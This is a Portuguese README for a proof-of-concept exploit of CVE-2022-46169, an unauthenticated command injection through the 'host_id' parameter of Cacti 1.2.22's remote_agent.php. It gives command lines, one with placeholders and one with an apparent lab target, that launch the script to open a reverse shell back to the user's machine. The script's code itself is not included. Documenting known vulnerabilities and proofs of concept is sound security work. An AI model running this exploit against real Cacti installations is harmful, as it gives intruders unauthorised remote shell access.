
Exploit de prova de conceito para CVE-2022-46169 que permite execução remota de código não autenticada via injeção de comando no Cacti 1.2.22.
Este é um script de Prova de Conceito (POC) para a vulnerabilidade CVE-2022-46169 que afeta o Cacti versão 1.2.22.
A vulnerabilidade CVE-2022-46169 permite uma injeção de comandos não autenticada nas versões do Cacti até a 1.2.22, possibilitando a execução remota de código não autenticada como o usuário www-data. A vulnerabilidade é causada pela validação inadequada da entrada do usuário no parâmetro "host_id" do arquivo "remote_agent.php".
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
Substitua <TARGET_URL> pela URL da instalação do Cacti alvo, <YOUR_IP> pelo endereço IP da máquina onde você deseja receber a reverse shell e <YOUR_PORT> pelo número da porta onde você deseja receber a reverse shell.
Exemplo:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
Este script de POC é apenas para fins educacionais. Use-o por sua conta e risco. O autor deste script não é responsável por qualquer dano causado pelo uso deste script. Referências